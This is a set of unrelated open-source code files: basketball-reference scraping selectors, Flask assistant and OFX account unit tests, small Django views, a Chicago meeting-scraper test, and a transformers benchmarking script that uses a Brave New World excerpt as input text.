'home_true_shooting_percentage': 'tfoot td[data-stat="ts_pct"]',
'home_effective_field_goal_percentage': 'tfoot td[data-stat="efg_pct"]',
'home_three_point_attempt_rate': 'tfoot td[data-stat="fg3a_per_fga_pct"]',
'home_free_throw_attempt_rate': 'tfoot td[data-stat="fta_per_fga_pct"]',
'home_offensive_rebound_percentage': 'tfoot td[data-stat="orb_pct"]',
'home_defensive_rebound_percentage': 'tfoot td[data-stat="drb_pct"]',
'home_total_rebound_percentage': 'tfoot td[data-stat="trb_pct"]',
'home_assist_percentage': 'tfoot td[data-stat="ast_pct"]',
'home_steal_percentage': 'tfoot td[data-stat="stl_pct"]',
'home_block_percentage': 'tfoot td[data-stat="blk_pct"]',
'home_turnover_percentage': 'tfoot td[data-stat="tov_pct"]',
'home_offensive_rating': 'tfoot td[data-stat="off_rtg"]',
'home_defensive_rating': 'tfoot td[data-stat="def_rtg"]'
}
BOXSCORE_ELEMENT_INDEX = {
'date': 0,
'location': 1,
'home_record': -1,
'home_minutes_played': 7,
'home_field_goals': 7,
'home_field_goal_attempts': 7,
'home_field_goal_percentage': 7,
'home_two_point_field_goals': 7,
'home_two_point_field_goal_attempts': 7,
'home_two_point_field_goal_percentage': 7,
'home_three_point_field_goals': 7,
'home_three_point_field_goal_attempts': 7,
'home_three_point_field_goal_percentage': 7,
'home_free_throws': 7,
'home_free_throw_attempts': 7,
'home_free_throw_percentage': 7,
'home_offensive_rebounds': 7,
'home_defensive_rebounds': 7,
'home_total_rebounds': 7,
'home_assists': 7,
'home_steals': 7,
'home_blocks': 7,
'home_turnovers': 7,
'home_personal_fouls': 7,
'home_points': -1,
'home_true_shooting_percentage': 7,
'home_effective_field_goal_percentage': 7,
'home_three_point_attempt_rate': 7,
'home_free_throw_attempt_rate': 7,
'home_offensive_rebound_percentage': 7,
'home_defensive_rebound_percentage': 7,
'home_total_rebound_percentage': 7,
'home_assist_percentage': 7,
'home_steal_percentage': 7,
'home_block_percentage': 7,
'home_turnover_percentage': 7,
'home_offensive_rating': 7,
'home_defensive_rating': 7
}
PLAYER_SCHEME = {
'summary': '[data-template="Partials/Teams/Summary"]',
'season': 'th[data-stat="season"]:first',
'name': 'h1',
'team_abbreviation': 'td[data-stat="team_id"]',
'position': 'td[data-stat="pos"]',
'height': 'span[itemprop="height"]',
'weight': 'span[itemprop="weight"]',
'birth_date': 'td[data-stat=""]',
'nationality': 'td[data-stat=""]',
'age': 'nobr',
'games_played': 'td[data-stat="g"]',
'games_started': 'td[data-stat="gs"]',
'minutes_played': 'td[data-stat="mp"]',
'field_goals': 'td[data-stat="fg"]',
'field_goal_attempts': 'td[data-stat="fga"]',
'field_goal_percentage': 'td[data-stat="fg_pct"]',
'three_pointers': 'td[data-stat="fg3"]',
'three_point_attempts': 'td[data-stat="fg3a"]',
'three_point_percentage': 'td[data-stat="fg3_pct"]',
'two_pointers': 'td[data-stat="fg2"]',
'two_point_attempts': 'td[data-stat="fg2a"]',
'two_point_percentage': 'td[data-stat="fg2_pct"]',
'effective_field_goal_percentage': 'td[data-stat="efg_pct"]',
'free_throws': 'td[data-stat="ft"]',
'free_throw_attempts': 'td[data-stat="fta"]',
'free_throw_percentage': 'td[data-stat="ft_pct"]',
'offensive_rebounds': 'td[data-stat="orb"]',
'defensive_rebounds': 'td[data-stat="drb"]',
'total_rebounds': 'td[data-stat="trb"]',
'assists': 'td[data-stat="ast"]',
'steals': 'td[data-stat="stl"]',
'blocks': 'td[data-stat="blk"]',
'turnovers': 'td[data-stat="tov"]',
'personal_fouls': 'td[data-stat="pf"]',
'points': 'td[data-stat="pts"]',
'player_efficiency_rating': 'td[data-stat="per"]',
'true_shooting_percentage': 'td[data-stat="ts_pct"]',
'three_point_attempt_rate': 'td[data-stat="fg3a_per_fga_pct"]',
'free_throw_attempt_rate': 'td[data-stat="fta_per_fga_pct"]',
'offensive_rebound_percentage': 'td[data-stat="orb_pct"]',
'defensive_rebound_percentage': 'td[data-stat="drb_pct"]',
'total_rebound_percentage': 'td[data-stat="trb_pct"]',
'assist_percentage': 'td[data-stat="ast_pct"]',
'steal_percentage': 'td[data-stat="stl_pct"]',
'block_percentage': 'td[data-stat="blk_pct"]',
'turnover_percentage': 'td[data-stat="tov_pct"]',
'usage_percentage': 'td[data-stat="usg_pct"]',
'offensive_win_shares': 'td[data-stat="ows"]',
'defensive_win_shares': 'td[data-stat="dws"]',
'win_shares': 'td[data-stat="ws"]',
'win_shares_per_48_minutes': 'td[data-stat="ws_per_48"]',
'offensive_box_plus_minus': 'td[data-stat="obpm"]',
'defensive_box_plus_minus': 'td[data-stat="dbpm"]',
'box_plus_minus': 'td[data-stat="bpm"]',
'defensive_rating': 'td[data-stat="def_rtg"]',
'offensive_rating': 'td[data-stat="off_rtg"]',
'boxscore_box_plus_minus': 'td[data-stat="plus_minus"]',
'value_over_replacement_player': 'td[data-stat="vorp"]',
'shooting_distance': 'td[data-stat="avg_dist"]',
'percentage_shots_two_pointers': 'td[data-stat="fg2a_pct_fga"]',
'percentage_zero_to_three_footers': 'td[data-stat="pct_fga_00_03"]',
'percentage_three_to_ten_footers': 'td[data-stat="pct_fga_03_10"]',
'percentage_ten_to_sixteen_footers': 'td[data-stat="pct_fga_10_16"]',
'percentage_sixteen_foot_plus_two_pointers':
'td[data-stat="pct_fga_16_xx"]',
'percentage_shots_three_pointers': 'td[data-stat="fg3a_pct_fga"]',
'field_goal_perc_zero_to_three_feet': 'td[data-stat="fg_pct_00_03"]',
'field_goal_perc_three_to_ten_feet': 'td[data-stat="fg_pct_03_10"]',
'field_goal_perc_ten_to_sixteen_feet': 'td[data-stat="fg_pct_10_16"]',
'field_goal_perc_sixteen_foot_plus_two_pointers':
'td[data-stat="fg_pct_16_xx"]',
'two_pointers_assisted_percentage': 'td[data-stat="fg2_pct_ast"]',
'percentage_field_goals_as_dunks': 'td[data-stat="pct_fg2_dunk"]',
'dunks': 'td[data-stat="fg2_dunk"]',
'three_pointers_assisted_percentage': 'td[data-stat="fg3_pct_ast"]',
'percentage_of_three_pointers_from_corner':
'td[data-stat="pct_fg3a_corner"]',
'three_point_shot_percentage_from_corner':
'td[data-stat="fg3_pct_corner"]',
'half_court_heaves': 'td[data-stat="fg3a_heave"]',
'half_court_heaves_made': 'td[data-stat="fg3_heave"]',
'point_guard_percentage': 'td[data-stat="pct_1"]',
'shooting_guard_percentage': 'td[data-stat="pct_2"]',
'small_forward_percentage': 'td[data-stat="pct_3"]',
'power_forward_percentage': 'td[data-stat="pct_4"]',
'center_percentage': 'td[data-stat="pct_5"]',
'on_court_plus_minus': 'td[data-stat="plus_minus_on"]',
'net_plus_minus': 'td[data-stat="plus_minus_net"]',
'passing_turnovers': 'td[data-stat="tov_bad_pass"]',
'lost_ball_turnovers': 'td[data-stat="tov_lost_ball"]',
'other_turnovers': 'td[data-stat="tov_other"]',
'shooting_fouls': 'td[data-stat="fouls_shooting"]',
'blocking_fouls': 'td[data-stat="fouls_blocking"]',
'offensive_fouls': 'td[data-stat="fouls_offensive"]',
'take_fouls': 'td[data-stat="fouls_take"]',
'points_generated_by_assists': 'td[data-stat="astd_pts"]',
'shooting_fouls_drawn': 'td[data-stat="drawn_shooting"]',
'and_ones': 'td[data-stat="and1s"]',
'shots_blocked': 'td[data-stat="fga_blkd"]',
'salary': 'td[data-stat="salary"]',
'field_goals_per_poss': 'td[data-stat="fg_per_poss"]',
'field_goal_attempts_per_poss': 'td[data-stat="fga_per_poss"]',
'three_pointers_per_poss': 'td[data-stat="fg3_per_poss"]',
'three_point_attempts_per_poss': 'td[data-stat="fg3a_per_poss"]',
'two_pointers_per_poss': 'td[data-stat="fg2_per_poss"]',
'two_point_attempts_per_poss': 'td[data-stat="fg2a_per_poss"]',
'free_throws_per_poss': 'td[data-stat="ft_per_poss"]',
'free_throw_attempts_per_poss': 'td[data-stat="fta_per_poss"]',
'offensive_rebounds_per_poss': 'td[data-stat="orb_per_poss"]',
'defensive_rebounds_per_poss': 'td[data-stat="drb_per_poss"]',
'total_rebounds_per_poss': 'td[data-stat="trb_per_poss"]',
'assists_per_poss': 'td[data-stat="ast_per_poss"]',
'steals_per_poss': 'td[data-stat="stl_per_poss"]',
'blocks_per_poss': 'td[data-stat="blk_per_poss"]',
'turnovers_per_poss': 'td[data-stat="tov_per_poss"]',
'personal_fouls_per_poss': 'td[data-stat="pf_per_poss"]',
'points_per_poss': 'td[data-stat="pts_per_poss"]'
}
NATIONALITY = {
'ao': 'Angola',
'ag': 'Antigua and Barbuda',
'ar': 'Argentina',
'au': 'Australia',
'at': 'Austria',
'bs': 'Bahamas',
'be': 'Belgium',
'ba': 'Bosnia and Herzegovina',
'br': 'Brazil',
'bg': 'Bulgaria',
'cm': 'Cameroon',
'ca': 'Canada',
'td': 'Chad',
'co': 'Colombia',
'cv': 'Cape Verde',
'cn': 'China',
'hr': 'Croatia',
'cu': 'Cuba',
'cz': 'Czech Republic',
    'cd': 'Democratic Republic of Congo',
'dk': 'Denmark',
'dm': 'Dominica',
    'do': 'Dominican Republic',
'eg': 'Egypt',
'ee': 'Estonia',
'fi': 'Finland',
'fr': 'France',
'gf': 'French Guiana',
'ga': 'Gabon',
'ge': 'Georgia',
'de': 'Germany',
'gh': 'Ghana',
'gr': 'Greece',
'gp': 'Guadeloupe',
'gn': 'Guinea',
'gy': 'Guyana',
'ht': 'Haiti',
'hu': 'Hungary',
'is': 'Iceland',
'ie': 'Ireland',
    'ir': 'Islamic Republic of Iran',
'il': 'Israel',
'it': 'Italy',
'jm': 'Jamaica',
'jp': 'Japan',
'lv': 'Latvia',
'lb': 'Lebanon',
'lt': 'Lithuania',
'lu': 'Luxembourg',
'ml': 'Mali',
'mq': 'Martinique',
'mx': 'Mexico',
'me': 'Montenegro',
'ma': 'Morocco',
'nl': 'Netherlands',
'nz': 'New Zealand',
'ng': 'Nigeria',
'no': 'Norway',
'pa': 'Panama',
'pl': 'Poland',
'pr': 'Puerto Rico',
'ke': 'Kenya',
'kr': 'Republic of Korea',
'mk': 'Republic of Macedonia',
'cg': 'Republic of Congo',
'ro': 'Romania',
'ru': 'Russian Federation',
'lc': 'Saint Lucia',
'vc': 'Saint Vincent and the Grenadines',
'sd': 'Sudan',
'sn': 'Senegal',
'rs': 'Serbia',
'sk': 'Slovakia',
'si': 'Slovenia',
'za': 'South Africa',
'ss': 'South Sudan',
'es': 'Spain',
'se': 'Sweden',
'ch': 'Switzerland',
'tw': 'Taiwan',
'tt': 'Trinidad and Tobago',
'tn': 'Tunisia',
'tr': 'Turkey',
'us': 'United States of America',
'vi': 'U.S. Virgin Islands',
'ua': 'Ukraine',
'gb': 'United Kingdom',
'tz': 'United Republic of Tanzania',
'uy': 'Uruguay',
've': 'Venezuela'
}
SEASON_PAGE_URL = 'http://www.basketball-reference.com/leagues/NBA_%s.html'
SCHEDULE_URL = 'http://www.basketball-reference.com/teams/%s/%s_games.html'
BOXSCORE_URL = 'https://www.basketball-reference.com/boxscores/%s.html'
BOXSCORES_URL = ('https://www.basketball-reference.com/boxscores/'
'?month=%s&day=%s&year=%s')
PLAYER_URL = 'https://www.basketball-reference.com/players/%s/%s.html'
ROSTER_URL = 'https://www.basketball-reference.com/teams/%s/%s.html'
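# Usage sketch (hypothetical; sportsipy normally does this internally): pull a
# single stat out of a parsed stats page with PyQuery using one of the
# selectors defined above.
def _example_points(page_html):
    """Return the team's points total from a season stats page fragment."""
    from pyquery import PyQuery as pq
    doc = pq(page_html)
    return doc(PARSING_SCHEME['points']).text()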
|
tests/test_assistant.py | y226xie/flask-assistant | 400 | 12740062 |
from flask_assistant.manager import Context
from tests.helpers import build_payload, get_query_response
def test_intents_with_different_formatting(simple_client, intent_payload):
resp = get_query_response(simple_client, intent_payload)
assert "Message" in resp["fulfillmentText"]
resp = simple_client.post("/", data=intent_payload)
assert resp.status_code == 200
assert b"Message" in resp.data
def test_add_context_to_response(context_assist):
client = context_assist.app.test_client()
payload = build_payload("AddContext")
resp = get_query_response(client, payload)
# full_name = f"projects/{context_assist._project_id}/agent/sessions/{context_assist.session_id}/contexts/SampleContext"
# context_item = {"lifespanCount": 5, "name": full_name, "parameters": {}}
# TODO access context_manager from assist, check for full context name
assert "SampleContext" in resp["outputContexts"][0]["name"]
# assert context_item in resp["outputContexts"]
def test_add_context_to_manager(context_assist):
    # Using the test client as a context manager keeps the request context
    # active, so Flask context locals can still be accessed after the request.
with context_assist.app.test_client() as client:
payload = build_payload("AddContext")
resp = get_query_response(client, payload)
context_obj = Context("SampleContext")
assert context_obj in context_assist.context_manager.active
# def test_need_context_to_match_action(context_assist):
# with context_assist.app.test_client() as client:
# payload = build_payload('ContextRequired')
# resp = get_query_response(client, payload)
# assert 'Matched because SampleContext was active' not in resp['speech']
def test_docs_context(docs_assist):
# adds 'vegetarian' context
with docs_assist.app.test_client() as client:
payload = build_payload("give-diet", params={"diet": "vegetarian"})
resp = get_query_response(client, payload)
context_obj = Context("vegetarian")
assert context_obj in docs_assist.context_manager.active
next_payload = build_payload("get-food", contexts=resp["outputContexts"])
next_resp = get_query_response(client, next_payload)
assert "farmers market" in next_resp["fulfillmentText"]
# adds 'carnivore' context
with docs_assist.app.test_client() as client:
payload = build_payload("give-diet", params={"diet": "carnivore"})
resp = get_query_response(client, payload)
context_obj = Context("carnivore")
assert context_obj in docs_assist.context_manager.active
next_payload = build_payload("get-food", contexts=resp["outputContexts"])
next_resp = get_query_response(client, next_payload)
assert "farmers market" not in next_resp["fulfillmentText"]
assert "BBQ" in next_resp["fulfillmentText"]
|
tests/account.py | chaserhkj/ofxclient | 219 | 12740099 | <gh_stars>100-1000
import unittest
from ofxclient import Account
from ofxclient import BankAccount
from ofxclient import BrokerageAccount
from ofxclient import CreditCardAccount
from ofxclient import Institution
class OfxAccountTests(unittest.TestCase):
def setUp(self):
institution = Institution(
id='1',
org='Example',
url='http://example.com',
username='username',
password='password'
)
self.institution = institution
def testNumberRequired(self):
a = {'institution': self.institution}
self.assertRaises(TypeError, Account, **a)
def testInstitutionRequired(self):
a = {'number': '12345'}
self.assertRaises(TypeError, Account, **a)
def testMasked(self):
account = Account(
number='12345',
institution=self.institution
)
self.assertEqual(account.number_masked(), '***2345')
account.number = '1234'
self.assertEqual(account.number_masked(), '***1234')
account.number = '123'
self.assertEqual(account.number_masked(), '***123')
account.number = '12'
self.assertEqual(account.number_masked(), '***12')
account.number = '1'
self.assertEqual(account.number_masked(), '***1')
def testDescription(self):
account = Account(
number='12345',
institution=self.institution
)
self.assertEqual(
account.description,
'***2345',
'kwarg is not required and defaults')
account = Account(
number='12345',
institution=self.institution,
description=None
)
self.assertEqual(account.description, '***2345', 'None defaults')
account = Account(
number='12345',
institution=self.institution,
description=''
)
self.assertEqual(
account.description,
'***2345',
'empty string desc defaults')
account = Account(
number='12345',
institution=self.institution,
description='0'
)
self.assertEqual(account.description, '0', '0 string is preserved')
account = Account(
number='12345',
institution=self.institution,
description='passed'
)
self.assertEqual(account.description, 'passed')
def testNoInstitution(self):
account = Account(
number='12345',
institution=None
)
|
newtest/views.py | judexzhu/dzhops | 202 | 12740143 | <reponame>judexzhu/dzhops
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
# Create your views here.
@login_required
def testHtml(request):
user = request.user.username
return render(
request,
'test.html'
)
@login_required
def testIndex(request):
user = request.user.username
return render(
request,
'anew/index.html'
) |
tests/test_chi_ssa_24.py | MAYANK25402/city-scrapers | 255 | 12740160 | <filename>tests/test_chi_ssa_24.py
from datetime import datetime
from os.path import dirname, join
import pytest # noqa
from city_scrapers_core.constants import COMMISSION, PASSED
from city_scrapers_core.utils import file_response
from freezegun import freeze_time
from city_scrapers.spiders.chi_ssa_24 import ChiSsa24Spider
test_response = file_response(
join(dirname(__file__), "files", "chi_ssa_24.html"), url="https://rpba.org/ssa-24/",
)
test_detail_response = file_response(
join(dirname(__file__), "files", "chi_ssa_24_detail.html"),
url=(
"https://business.rpba.org/events/details/clark-morse-glenwood-ssa-24-commissioners-meeting-6355" # noqa
),
)
spider = ChiSsa24Spider()
freezer = freeze_time("2019-12-10")
freezer.start()
spider.link_date_map = spider._parse_links(test_response)
parsed_item = [item for item in spider._parse_detail(test_detail_response)][0]
freezer.stop()
def test_title():
assert parsed_item["title"] == "Commission"
def test_description():
assert parsed_item["description"] == ""
def test_start():
assert parsed_item["start"] == datetime(2019, 9, 4, 9, 0)
def test_end():
assert parsed_item["end"] == datetime(2019, 9, 4, 10, 0)
def test_time_notes():
assert parsed_item["time_notes"] == ""
def test_id():
assert parsed_item["id"] == "chi_ssa_24/201909040900/x/commission"
def test_status():
assert parsed_item["status"] == PASSED
def test_location():
assert parsed_item["location"] == {
"address": "1448 W. Morse Ave. Chicago, IL 60626",
"name": "Rogers Park Business Alliance",
}
def test_source():
assert parsed_item["source"] == test_detail_response.url
def test_links():
assert parsed_item["links"] == [
{
"href": "https://rpba.org/wp-content/uploads/2019/09/24-9.4.19-Agenda.pdf",
"title": "Agenda",
},
{
"href": "https://rpba.org/wp-content/uploads/2019/11/24-9.4.19-Minutes.pdf",
"title": "Minutes",
},
]
def test_classification():
assert parsed_item["classification"] == COMMISSION
def test_all_day():
assert parsed_item["all_day"] is False
|
examples/benchmarks.py | ari-holtzman/transformers | 107 | 12740203 | <filename>examples/benchmarks.py<gh_stars>100-1000
# coding=utf-8
# Copyright 2018 The HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Benchmarking the library on inference and training """
# If checking the tensors placement
# tf.debugging.set_log_device_placement(True)
import argparse
import csv
import timeit
from time import time
from typing import List
from transformers import AutoConfig, AutoTokenizer, is_tf_available, is_torch_available
if is_tf_available():
import tensorflow as tf
from transformers import TFAutoModel
if is_torch_available():
import torch
from transformers import AutoModel
input_text = """Bent over their instruments, three hundred Fertilizers were plunged, as
the Director of Hatcheries and Conditioning entered the room, in the
scarcely breathing silence, the absent-minded, soliloquizing hum or
whistle, of absorbed concentration. A troop of newly arrived students,
very young, pink and callow, followed nervously, rather abjectly, at the
Director's heels. Each of them carried a notebook, in which, whenever
the great man spoke, he desperately scribbled. Straight from the
horse's mouth. It was a rare privilege. The D. H. C. for Central London
always made a point of personally conducting his new students round
the various departments.
"Just to give you a general idea," he would explain to them. For of
course some sort of general idea they must have, if they were to do
their work intelligently-though as little of one, if they were to be good
and happy members of society, as possible. For particulars, as every
one knows, make for virtue and happiness; generalities are intellectu-
ally necessary evils. Not philosophers but fret-sawyers and stamp col-
lectors compose the backbone of society.
"To-morrow," he would add, smiling at them with a slightly menacing
geniality, "you'll be settling down to serious work. You won't have time
for generalities. Meanwhile ..."
Meanwhile, it was a privilege. Straight from the horse's mouth into the
notebook. The boys scribbled like mad.
Tall and rather thin but upright, the Director advanced into the room.
He had a long chin and big rather prominent teeth, just covered, when
he was not talking, by his full, floridly curved lips. Old, young? Thirty?
Fifty? Fifty-five? It was hard to say. And anyhow the question didn't
arise; in this year of stability, A. F. 632, it didn't occur to you to ask it.
"I shall begin at the beginning," said the D.H.C. and the more zealous
students recorded his intention in their notebooks: Begin at the begin-
ning. "These," he waved his hand, "are the incubators." And opening
an insulated door he showed them racks upon racks of numbered test-
tubes. "The week's supply of ova. Kept," he explained, "at blood heat;
whereas the male gametes," and here he opened another door, "they
have to be kept at thirty-five instead of thirty-seven. Full blood heat
sterilizes." Rams wrapped in theremogene beget no lambs.
Still leaning against the incubators he gave them, while the pencils
scurried illegibly across the pages, a brief description of the modern
fertilizing process; spoke first, of course, of its surgical introduc-
tion-"the operation undergone voluntarily for the good of Society, not
to mention the fact that it carries a bonus amounting to six months'
salary"; continued with some account of the technique for preserving
the excised ovary alive and actively developing; passed on to a consid-
eration of optimum temperature, salinity, viscosity; referred to the liq-
uor in which the detached and ripened eggs were kept; and, leading
his charges to the work tables, actually showed them how this liquor
was drawn off from the test-tubes; how it was let out drop by drop
onto the specially warmed slides of the microscopes; how the eggs
which it contained were inspected for abnormalities, counted and
transferred to a porous receptacle; how (and he now took them to
watch the operation) this receptacle was immersed in a warm bouillon
containing free-swimming spermatozoa-at a minimum concentration
of one hundred thousand per cubic centimetre, he insisted; and how,
after ten minutes, the container was lifted out of the liquor and its
contents re-examined; how, if any of the eggs remained unfertilized, it
was again immersed, and, if necessary, yet again; how the fertilized
ova went back to the incubators; where the Alphas and Betas re-
mained until definitely bottled; while the Gammas, Deltas and Epsilons
were brought out again, after only thirty-six hours, to undergo Bo-
kanovsky's Process.
"Bokanovsky's Process," repeated the Director, and the students un-
derlined the words in their little notebooks.
One egg, one embryo, one adult-normality. But a bokanovskified egg
will bud, will proliferate, will divide. From eight to ninety-six buds, and
every bud will grow into a perfectly formed embryo, and every embryo
into a full-sized adult. Making ninety-six human beings grow where
only one grew before. Progress.
"Essentially," the D.H.C. concluded, "bokanovskification consists of a
series of arrests of development. We check the normal growth and,
paradoxically enough, the egg responds by budding."
Responds by budding. The pencils were busy.
He pointed. On a very slowly moving band a rack-full of test-tubes was
entering a large metal box, another, rack-full was emerging. Machinery
faintly purred. It took eight minutes for the tubes to go through, he
told them. Eight minutes of hard X-rays being about as much as an
egg can stand. A few died; of the rest, the least susceptible divided
into two; most put out four buds; some eight; all were returned to the
incubators, where the buds began to develop; then, after two days,
were suddenly chilled, chilled and checked. Two, four, eight, the buds
in their turn budded; and having budded were dosed almost to death
with alcohol; consequently burgeoned again and having budded-bud
out of bud out of bud-were thereafter-further arrest being generally
fatal-left to develop in peace. By which time the original egg was in a
fair way to becoming anything from eight to ninety-six embryos- a
prodigious improvement, you will agree, on nature. Identical twins-but
not in piddling twos and threes as in the old viviparous days, when an
egg would sometimes accidentally divide; actually by dozens, by
scores at a time.
"Scores," the Director repeated and flung out his arms, as though he
were distributing largesse. "Scores."
But one of the students was fool enough to ask where the advantage
lay.
"My good boy!" The Director wheeled sharply round on him. "Can't you
see? Can't you see?" He raised a hand; his expression was solemn.
"Bokanovsky's Process is one of the major instruments of social stabil-
ity!"
Major instruments of social stability.
Standard men and women; in uniform batches. The whole of a small
factory staffed with the products of a single bokanovskified egg.
"Ninety-six identical twins working ninety-six identical machines!" The
voice was almost tremulous with enthusiasm. "You really know where
you are. For the first time in history." He quoted the planetary motto.
"Community, Identity, Stability." Grand words. "If we could bo-
kanovskify indefinitely the whole problem would be solved."
Solved by standard Gammas, unvarying Deltas, uniform Epsilons. Mil-
lions of identical twins. The principle of mass production at last applied
to biology.
"But, alas," the Director shook his head, "we can't bokanovskify indefi-
nitely."
Ninety-six seemed to be the limit; seventy-two a good average. From
the same ovary and with gametes of the same male to manufacture as
many batches of identical twins as possible-that was the best (sadly a
second best) that they could do. And even that was difficult.
"For in nature it takes thirty years for two hundred eggs to reach ma-
turity. But our business is to stabilize the population at this moment,
here and now. Dribbling out twins over a quarter of a century-what
would be the use of that?"
Obviously, no use at all. But Podsnap's Technique had immensely ac-
celerated the process of ripening. They could make sure of at least a
hundred and fifty mature eggs within two years. Fertilize and bo-
kanovskify-in other words, multiply by seventy-two-and you get an
average of nearly eleven thousand brothers and sisters in a hundred
and fifty batches of identical twins, all within two years of the same
age.
"And in exceptional cases we can make one ovary yield us over fifteen
thousand adult individuals."
Beckoning to a fair-haired, ruddy young man who happened to be
passing at the moment. "<NAME>," he called. The ruddy young man
approached. "Can you tell us the record for a single ovary, <NAME>?"
"Sixteen thousand and twelve in this Centre," <NAME> replied with-
out hesitation. He spoke very quickly, had a vivacious blue eye, and
took an evident pleasure in quoting figures. "Sixteen thousand and
twelve; in one hundred and eighty-nine batches of identicals. But of
course they've done much better," he rattled on, "in some of the tropi-
cal Centres. Singapore has often produced over sixteen thousand five
hundred; and Mombasa has actually touched the seventeen thousand
mark. But then they have unfair advantages. You should see the way a
negro ovary responds to pituitary! It's quite astonishing, when you're
used to working with European material. Still," he added, with a laugh
(but the light of combat was in his eyes and the lift of his chin was
challenging), "still, we mean to beat them if we can. I'm working on a
wonderful Delta-Minus ovary at this moment. Only just eighteen
months old. Over twelve thousand seven hundred children already, ei-
ther decanted or in embryo. And still going strong. We'll beat them
yet."
"That's the spirit I like!" cried the Director, and clapped <NAME> on
the shoulder. "Come along with us, and give these boys the benefit of
your expert knowledge."
Mr. Foster smiled modestly. "With pleasure." They went.
In the Bottling Room all was harmonious bustle and ordered activity.
Flaps of fresh sow's peritoneum ready cut to the proper size came
shooting up in little lifts from the Organ Store in the sub-basement.
Whizz and then, click! the lift-hatches hew open; the bottle-liner had
only to reach out a hand, take the flap, insert, smooth-down, and be-
fore the lined bottle had had time to travel out of reach along the end-
less band, whizz, click! another flap of peritoneum had shot up from
the depths, ready to be slipped into yet another bottle, the next of that
slow interminable procession on the band.
Next to the Liners stood the Matriculators. The procession advanced;
one by one the eggs were transferred from their test-tubes to the
larger containers; deftly the peritoneal lining was slit, the morula
dropped into place, the saline solution poured in ... and already the
bottle had passed, and it was the turn of the labellers. Heredity, date
of fertilization, membership of Bokanovsky Group-details were trans-
ferred from test-tube to bottle. No longer anonymous, but named,
identified, the procession marched slowly on; on through an opening in
the wall, slowly on into the Social Predestination Room.
"Eighty-eight cubic metres of card-index," said Mr. Foster with relish,
as they entered."""
def create_setup_and_compute(
model_names: List[str],
gpu: bool = True,
tensorflow: bool = False,
average_over: int = 3,
torchscript: bool = False,
xla: bool = False,
amp: bool = False,
fp16: bool = False,
save_to_csv: bool = False,
csv_filename: str = f"results_{round(time())}.csv",
):
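    # Benchmark every checkpoint, print a timing summary per batch size and sequence length, and optionally write the results to a CSV file.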
if xla:
tf.config.optimizer.set_jit(True)
if amp:
tf.config.optimizer.set_experimental_options({"auto_mixed_precision": True})
if tensorflow:
dictionary = {model_name: {} for model_name in model_names}
results = _compute_tensorflow(model_names, dictionary, average_over, amp)
else:
device = "cuda" if (gpu and torch.cuda.is_available()) else "cpu"
dictionary = {model_name: {} for model_name in model_names}
results = _compute_pytorch(model_names, dictionary, average_over, device, torchscript, fp16)
print("=========== RESULTS ===========")
for model_name in model_names:
print("\t" + f"======= MODEL CHECKPOINT: {model_name} =======")
for batch_size in results[model_name]["bs"]:
print("\t\t" + f"===== BATCH SIZE: {batch_size} =====")
for slice_size in results[model_name]["ss"]:
result = results[model_name]["results"][batch_size][slice_size]
if isinstance(result, str):
print(f"\t\t{model_name}/{batch_size}/{slice_size}: " f"{result}")
else:
print(f"\t\t{model_name}/{batch_size}/{slice_size}: " f"{(round(1000 * result) / 1000)}" f"s")
if save_to_csv:
with open(csv_filename, mode="w") as csv_file:
fieldnames = [
"model",
"1x8",
"1x64",
"1x128",
"1x256",
"1x512",
"1x1024",
"2x8",
"2x64",
"2x128",
"2x256",
"2x512",
"2x1024",
"4x8",
"4x64",
"4x128",
"4x256",
"4x512",
"4x1024",
"8x8",
"8x64",
"8x128",
"8x256",
"8x512",
"8x1024",
]
writer = csv.DictWriter(csv_file, fieldnames=fieldnames)
writer.writeheader()
for model_name in model_names:
model_results = {
f"{bs}x{ss}": results[model_name]["results"][bs][ss]
for bs in results[model_name]["results"]
for ss in results[model_name]["results"][bs]
}
writer.writerow({"model": model_name, **model_results})
def _compute_pytorch(model_names, dictionary, average_over, device, torchscript, fp16):
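    # Time the PyTorch forward pass (optionally traced with torchscript and/or run in fp16) for every batch size / sequence length pair; oversized or out-of-memory combinations are recorded as "N/A".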
for c, model_name in enumerate(model_names):
print(f"{c + 1} / {len(model_names)}")
config = AutoConfig.from_pretrained(model_name, torchscript=torchscript)
model = AutoModel.from_pretrained(model_name, config=config)
tokenizer = AutoTokenizer.from_pretrained(model_name)
tokenized_sequence = tokenizer.encode(input_text, add_special_tokens=False)
max_input_size = tokenizer.max_model_input_sizes[model_name]
batch_sizes = [1, 2, 4, 8]
slice_sizes = [8, 64, 128, 256, 512, 1024]
dictionary[model_name] = {"bs": batch_sizes, "ss": slice_sizes, "results": {}}
dictionary[model_name]["results"] = {i: {} for i in batch_sizes}
for batch_size in batch_sizes:
if fp16:
model.half()
model.to(device)
model.eval()
for slice_size in slice_sizes:
if max_input_size is not None and slice_size > max_input_size:
dictionary[model_name]["results"][batch_size][slice_size] = "N/A"
else:
sequence = torch.tensor(tokenized_sequence[:slice_size], device=device).repeat(batch_size, 1)
try:
if torchscript:
print("Tracing model with sequence size", sequence.shape)
inference = torch.jit.trace(model, sequence)
inference(sequence)
else:
inference = model
inference(sequence)
print("Going through model with sequence of shape", sequence.shape)
runtimes = timeit.repeat(lambda: inference(sequence), repeat=average_over, number=3)
average_time = sum(runtimes) / float(len(runtimes)) / 3.0
dictionary[model_name]["results"][batch_size][slice_size] = average_time
except RuntimeError as e:
print("Doesn't fit on GPU.", e)
torch.cuda.empty_cache()
dictionary[model_name]["results"][batch_size][slice_size] = "N/A"
return dictionary
def _compute_tensorflow(model_names, dictionary, average_over, amp):
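    # Same sweep for the TensorFlow models; the forward pass is wrapped in a tf.function and called once so it is traced before timing.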
for c, model_name in enumerate(model_names):
print(f"{c + 1} / {len(model_names)}")
config = AutoConfig.from_pretrained(model_name)
model = TFAutoModel.from_pretrained(model_name, config=config)
tokenizer = AutoTokenizer.from_pretrained(model_name)
tokenized_sequence = tokenizer.encode(input_text, add_special_tokens=False)
max_input_size = tokenizer.max_model_input_sizes[model_name]
batch_sizes = [1, 2, 4, 8]
slice_sizes = [8, 64, 128, 256, 512, 1024]
